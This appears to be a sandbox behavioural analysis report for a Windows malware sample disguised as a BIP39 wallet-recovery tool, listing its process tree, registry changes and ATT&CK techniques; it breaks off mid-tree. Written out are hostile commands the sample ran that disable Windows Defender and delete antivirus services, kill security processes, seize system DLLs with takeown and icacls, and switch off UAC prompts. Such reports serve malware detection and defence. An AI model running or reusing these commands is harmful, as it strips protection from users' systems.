Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	get.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	getrunstime.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sshclients.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bip39-master-recovery®.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	getc.o.s.r.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 9 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	Process
2664	PING.EXE
3008	PING.EXE
1896	PING.EXE
3016	PING.EXE
1536	PING.EXE
1616	PING.EXE
2492	PING.EXE
2288	PING.EXE
1740	PING.EXE

Delays execution with timeout.exe 8 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	Process
1660	timeout.exe
2512	timeout.exe
3052	timeout.exe
2816	timeout.exe
576	timeout.exe
1324	timeout.exe
2952	timeout.exe
924	timeout.exe

Gathers system information 1 TTPs 3 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

Processes:

systeminfo.exesysteminfo.exesysteminfo.exe

pid	Process
2880	systeminfo.exe
2264	systeminfo.exe
2060	systeminfo.exe

Kills process with taskkill 3 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid	Process
392	taskkill.exe
1200	taskkill.exe
2072	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{8E265801-AC41-11EF-A723-5ADFF6BE2048} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004ecf3e4259aa05419b9c0951a15b131900000000020000000000106600000001000020000000792a8db279f6f4186147334a718fd0cf2eb12dc25003382b60e8f8754a754de5000000000e80000000020000200000005789e2dca9b42f504ed68ce77bff526ef38f3fb9f351dd82a21d6bc9c5683e75900000002286fcd9270ed8277ac9239eb29223e20dc315cf655203d80d9f717c84179306def16df1d74340a1cc0b01758245d6d17de42e8624f59beeb36e55d359ba28d3e48bc015f134c83aefed831d08fb6bc2c43a33698d6caaabca37a316778982bb7ce7446e36c8cd2cbdcf1d56eb1ee48b391b420d3d86fe5503ef5721d923cf28455ad1872279e18513284865d7c9d275400000007490977659b2ebf138644475cd52dc581b0bbd0b1745e6bf4e15ce15c6b3bbfc57c7f0d1939b9e8d1bf0658bbc94ba3bed28bd9d34a27623c1682227a0b6f344	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "438820201"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004ecf3e4259aa05419b9c0951a15b13190000000002000000000010660000000100002000000070acb44d440c5fea1cb06fd306e1c5006ae61159b4f1d9e208224f6bae68cac5000000000e8000000002000020000000308051781a9728d1c4ec7159142c14970c599a43bce134ceb0e6e0ed96f12d3f200000009e973fde72339c36e99ec7196fa29b0f956f0024cdf80423f94d32ebbfa79534400000001110786a8ce60b22114f9e92fff095d0c758d2b6437194131033e3921a6491eb09e716fb63b348810937871eb0acf961af6f6d06223e835be7cb42529dc19989	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c081a2644e40db01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe

Runs ping.exe 1 TTPs 9 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	Process
1896	PING.EXE
2288	PING.EXE
1740	PING.EXE
2664	PING.EXE
3008	PING.EXE
2492	PING.EXE
3016	PING.EXE
1536	PING.EXE
1616	PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

msiexec.exe

pid	Process
2208	msiexec.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2552	powershell.exe
2372	powershell.exe
1536	powershell.exe
2080	powershell.exe
3064	powershell.exe
1656	powershell.exe
2112	powershell.exe
1704	powershell.exe
2516	powershell.exe
1112	powershell.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs

Processes:

takeown.exetakeown.exetakeown.exetaskkill.exetaskkill.exetaskkill.exepowershell.exemsiexec.exemsiexec.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	Process
Token: SeTakeOwnershipPrivilege	3016	takeown.exe
Token: SeTakeOwnershipPrivilege	2384	takeown.exe
Token: SeTakeOwnershipPrivilege	2652	takeown.exe
Token: SeDebugPrivilege	1200	taskkill.exe
Token: SeDebugPrivilege	2072	taskkill.exe
Token: SeDebugPrivilege	392	taskkill.exe
Token: SeDebugPrivilege	2552	powershell.exe
Token: SeShutdownPrivilege	2208	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2208	msiexec.exe
Token: SeRestorePrivilege	2508	msiexec.exe
Token: SeTakeOwnershipPrivilege	2508	msiexec.exe
Token: SeSecurityPrivilege	2508	msiexec.exe
Token: SeDebugPrivilege	2372	powershell.exe
Token: SeCreateTokenPrivilege	2208	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2208	msiexec.exe
Token: SeLockMemoryPrivilege	2208	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2208	msiexec.exe
Token: SeMachineAccountPrivilege	2208	msiexec.exe
Token: SeTcbPrivilege	2208	msiexec.exe
Token: SeSecurityPrivilege	2208	msiexec.exe
Token: SeTakeOwnershipPrivilege	2208	msiexec.exe
Token: SeLoadDriverPrivilege	2208	msiexec.exe
Token: SeSystemProfilePrivilege	2208	msiexec.exe
Token: SeSystemtimePrivilege	2208	msiexec.exe
Token: SeProfSingleProcessPrivilege	2208	msiexec.exe
Token: SeIncBasePriorityPrivilege	2208	msiexec.exe
Token: SeCreatePagefilePrivilege	2208	msiexec.exe
Token: SeCreatePermanentPrivilege	2208	msiexec.exe
Token: SeBackupPrivilege	2208	msiexec.exe
Token: SeRestorePrivilege	2208	msiexec.exe
Token: SeShutdownPrivilege	2208	msiexec.exe
Token: SeDebugPrivilege	2208	msiexec.exe
Token: SeAuditPrivilege	2208	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2208	msiexec.exe
Token: SeChangeNotifyPrivilege	2208	msiexec.exe
Token: SeRemoteShutdownPrivilege	2208	msiexec.exe
Token: SeUndockPrivilege	2208	msiexec.exe
Token: SeSyncAgentPrivilege	2208	msiexec.exe
Token: SeEnableDelegationPrivilege	2208	msiexec.exe
Token: SeManageVolumePrivilege	2208	msiexec.exe
Token: SeImpersonatePrivilege	2208	msiexec.exe
Token: SeCreateGlobalPrivilege	2208	msiexec.exe
Token: SeDebugPrivilege	1536	powershell.exe
Token: SeDebugPrivilege	2080	powershell.exe
Token: SeDebugPrivilege	3064	powershell.exe
Token: SeDebugPrivilege	1656	powershell.exe
Token: SeDebugPrivilege	2112	powershell.exe
Token: SeDebugPrivilege	1704	powershell.exe
Token: SeDebugPrivilege	2516	powershell.exe
Token: SeDebugPrivilege	1112	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid	Process
708	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid	Process
708	iexplore.exe
708	iexplore.exe
1308	IEXPLORE.EXE
1308	IEXPLORE.EXE
1308	IEXPLORE.EXE
1308	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exebip39-master-recovery®.execmd.exec.o.s.r-v9'.exesys-version27'.exebip39-master-recover.exeiexplore.exesys-v17'.exe

description	pid	Process	procid_target
PID 1684 wrote to memory of 2980	1684	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe	30
PID 1684 wrote to memory of 2980	1684	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe	30
PID 1684 wrote to memory of 2980	1684	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe	30
PID 1684 wrote to memory of 2980	1684	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe	30
PID 1684 wrote to memory of 2980	1684	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe	30
PID 1684 wrote to memory of 2980	1684	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe	30
PID 1684 wrote to memory of 2980	1684	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe	30
PID 2980 wrote to memory of 1648	2980	bip39-master-recovery®.exe	31
PID 2980 wrote to memory of 1648	2980	bip39-master-recovery®.exe	31
PID 2980 wrote to memory of 1648	2980	bip39-master-recovery®.exe	31
PID 2980 wrote to memory of 1648	2980	bip39-master-recovery®.exe	31
PID 2980 wrote to memory of 1648	2980	bip39-master-recovery®.exe	31
PID 2980 wrote to memory of 1648	2980	bip39-master-recovery®.exe	31
PID 2980 wrote to memory of 1648	2980	bip39-master-recovery®.exe	31
PID 1648 wrote to memory of 864	1648	cmd.exe	33
PID 1648 wrote to memory of 864	1648	cmd.exe	33
PID 1648 wrote to memory of 864	1648	cmd.exe	33
PID 1648 wrote to memory of 864	1648	cmd.exe	33
PID 1648 wrote to memory of 864	1648	cmd.exe	33
PID 1648 wrote to memory of 864	1648	cmd.exe	33
PID 1648 wrote to memory of 864	1648	cmd.exe	33
PID 864 wrote to memory of 2756	864	c.o.s.r-v9'.exe	34
PID 864 wrote to memory of 2756	864	c.o.s.r-v9'.exe	34
PID 864 wrote to memory of 2756	864	c.o.s.r-v9'.exe	34
PID 864 wrote to memory of 2756	864	c.o.s.r-v9'.exe	34
PID 864 wrote to memory of 2756	864	c.o.s.r-v9'.exe	34
PID 864 wrote to memory of 2756	864	c.o.s.r-v9'.exe	34
PID 864 wrote to memory of 2756	864	c.o.s.r-v9'.exe	34
PID 1648 wrote to memory of 2812	1648	cmd.exe	35
PID 1648 wrote to memory of 2812	1648	cmd.exe	35
PID 1648 wrote to memory of 2812	1648	cmd.exe	35
PID 1648 wrote to memory of 2812	1648	cmd.exe	35
PID 1648 wrote to memory of 2812	1648	cmd.exe	35
PID 1648 wrote to memory of 2812	1648	cmd.exe	35
PID 1648 wrote to memory of 2812	1648	cmd.exe	35
PID 2756 wrote to memory of 1576	2756	sys-version27'.exe	36
PID 2756 wrote to memory of 1576	2756	sys-version27'.exe	36
PID 2756 wrote to memory of 1576	2756	sys-version27'.exe	36
PID 2756 wrote to memory of 1576	2756	sys-version27'.exe	36
PID 2756 wrote to memory of 1576	2756	sys-version27'.exe	36
PID 2756 wrote to memory of 1576	2756	sys-version27'.exe	36
PID 2756 wrote to memory of 1576	2756	sys-version27'.exe	36
PID 2812 wrote to memory of 708	2812	bip39-master-recover.exe	39
PID 2812 wrote to memory of 708	2812	bip39-master-recover.exe	39
PID 2812 wrote to memory of 708	2812	bip39-master-recover.exe	39
PID 2812 wrote to memory of 708	2812	bip39-master-recover.exe	39
PID 708 wrote to memory of 1308	708	iexplore.exe	40
PID 708 wrote to memory of 1308	708	iexplore.exe	40
PID 708 wrote to memory of 1308	708	iexplore.exe	40
PID 708 wrote to memory of 1308	708	iexplore.exe	40
PID 708 wrote to memory of 1308	708	iexplore.exe	40
PID 708 wrote to memory of 1308	708	iexplore.exe	40
PID 708 wrote to memory of 1308	708	iexplore.exe	40
PID 1648 wrote to memory of 2360	1648	cmd.exe	41
PID 1648 wrote to memory of 2360	1648	cmd.exe	41
PID 1648 wrote to memory of 2360	1648	cmd.exe	41
PID 1648 wrote to memory of 2360	1648	cmd.exe	41
PID 1648 wrote to memory of 2360	1648	cmd.exe	41
PID 1648 wrote to memory of 2360	1648	cmd.exe	41
PID 1648 wrote to memory of 2360	1648	cmd.exe	41
PID 2360 wrote to memory of 952	2360	sys-v17'.exe	42
PID 2360 wrote to memory of 952	2360	sys-v17'.exe	42
PID 2360 wrote to memory of 952	2360	sys-v17'.exe	42
PID 2360 wrote to memory of 952	2360	sys-v17'.exe	42

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	Process
2480	attrib.exe
2600	attrib.exe
2260	attrib.exe
2448	attrib.exe
876	attrib.exe
2792	attrib.exe

C:\Users\Admin\AppData\Local\Temp\3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
"C:\Users\Admin\AppData\Local\Temp\3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe"
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1684
- C:\Windows\SysWOW64\java\bip39-master-recovery®.exe
  "C:\Windows\SysWOW64\java\bip39-master-recovery®.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2980
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\D2AA.tmp\bip39-master-recover®c.o.s.r-v21'.bat" "
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1648
  - - C:\Windows\SysWOW64\java\c.o.s.r-v9'.exe
      c.o.s.r-v9'.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:864
    - - C:\Windows\SysWOW64\xml\sys-version27'.exe
        
        "C:\Windows\SysWOW64\xml\sys-version27'.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2756
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\D894.tmp\av.bat" "
        6⤵
        
        PID:1576
  - - C:\Windows\SysWOW64\java\bip39-master-recover.exe
      bip39-master-recover.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2812
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\bip39-master\bip39-standalone.html
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:708
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:708 CREDAT:275457 /prefetch:2
        6⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1308
  - - C:\Windows\SysWOW64\xml\sys-v17'.exe
      "C:\Windows\SysWOW64\xml\sys-v17'.exe"
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious use of WriteProcessMemory
      PID:2360
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\E762.tmp\sys-c.o.s.r(debknci').bat" "
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:952
      - C:\Windows\SysWOW64\java\github.exe
        
        github.exe 1 sys-c.o.s.r-terkunci.exe sys-networks'.exe @sys.v10@a2
        6⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:2136
      - C:\Windows\SysWOW64\java\sys-networks'.exe
        
        sys-networks'.exe
        6⤵
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:1144
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\ED8A.tmp\x86x64(c.o.s.r).bat" "
        7⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2140
        
        C:\Windows\SysWOW64\systeminfo.exe
        
        systeminfo.exe
        8⤵
        Gathers system information
        
        PID:2880
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /B /C:"OS Name" /C:"System Type" /C:"Host Name"
        8⤵
        
        PID:2868
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\sysinfo-c.o.s.r-v9.txt" "
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2792
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "x64-based"
        8⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\java\securesatudua-x64.exe
        
        securesatudua-x64.exe
        8⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:2780
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Windows\System32\securesatudua.bat"
        9⤵
        
        PID:1940
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\wscapi.dll
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:3016
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\wscapi.dll /grant administrators:F
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3044
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\wscsvc.dll
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:2384
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\wscsvc.dll /grant administrators:F
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3048
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\wscui.cpl
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:2652
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\wscui.dll /grant administrators:F
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3008
        
        C:\Windows\system32\sc.exe
        
        sc.exe config WinDefend start= disabled
        10⤵
        Launches sc.exe
        
        PID:2176
        
        C:\Windows\system32\sc.exe
        
        sc stop "avast! Antivirus"
        10⤵
        Launches sc.exe
        
        PID:1808
        
        C:\Windows\system32\sc.exe
        
        sc delete "avast! Antivirus"
        10⤵
        Launches sc.exe
        
        PID:2028
        
        C:\Windows\system32\sc.exe
        
        sc stop "NanoServiceMain"
        10⤵
        Launches sc.exe
        
        PID:1208
        
        C:\Windows\system32\sc.exe
        
        sc delete "NanoServiceMain"
        10⤵
        Launches sc.exe
        
        PID:1068
        
        C:\Windows\system32\sc.exe
        
        sc stop newserv
        10⤵
        Launches sc.exe
        
        PID:2364
        
        C:\Windows\system32\sc.exe
        
        sc delete newserv
        10⤵
        Launches sc.exe
        
        PID:2916
        
        C:\Windows\system32\sc.exe
        
        sc stop UxSms
        10⤵
        Launches sc.exe
        
        PID:2284
        
        C:\Windows\system32\sc.exe
        
        sc delete UxSms
        10⤵
        Launches sc.exe
        
        PID:2600
        
        C:\Windows\system32\sc.exe
        
        sc stop WerSvc
        10⤵
        Launches sc.exe
        
        PID:2296
        
        C:\Windows\system32\sc.exe
        
        sc config WerSvc start= disabled
        10⤵
        Launches sc.exe
        
        PID:1828
        
        C:\Windows\system32\sc.exe
        
        sc stop "MBAMService"
        10⤵
        Launches sc.exe
        
        PID:3052
        
        C:\Windows\system32\sc.exe
        
        sc config "MBAMService" start= disabled
        10⤵
        Launches sc.exe
        
        PID:2476
        
        C:\Windows\system32\taskkill.exe
        
        Taskkill /im msseces.exe /f
        10⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1200
        
        C:\Windows\system32\taskkill.exe
        
        TASKKILL /F /IM MSASCui.exe
        10⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2072
        
        C:\Windows\system32\taskkill.exe
        
        TASKKILL /F /IM ByteFence.exe
        10⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:392
        
        C:\Windows\system32\sc.exe
        
        sc stop "rtop"
        10⤵
        Launches sc.exe
        
        PID:1616
        
        C:\Windows\system32\sc.exe
        
        sc config "rtop" start= disabled
        10⤵
        Launches sc.exe
        
        PID:928
        
        C:\Windows\system32\sc.exe
        
        sc delete "rtop"
        10⤵
        Launches sc.exe
        
        PID:2128
        
        C:\Windows\system32\reg.exe
        
        reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v MSC
        10⤵
        
        PID:2668
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 00000000 /f
        10⤵
        UAC bypass
        
        PID:2680
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v AutoShareWKS /t REG_DWORD /d 00000001 /f
        10⤵
        
        PID:1748
        
        C:\Windows\System32\msiexec.exe
        
        C:\Windows\System32\msiexec.exe /x {8F023021-A7EB-45D3-9269-D65264C81729} /quiet
        10⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:2208
        
        C:\Windows\SysWOW64\java\kvdb.x64.exe
        
        kvdb.x64.exe
        8⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:1124
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\426.tmp\kvdb.bat" "
        9⤵
        
        PID:2060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
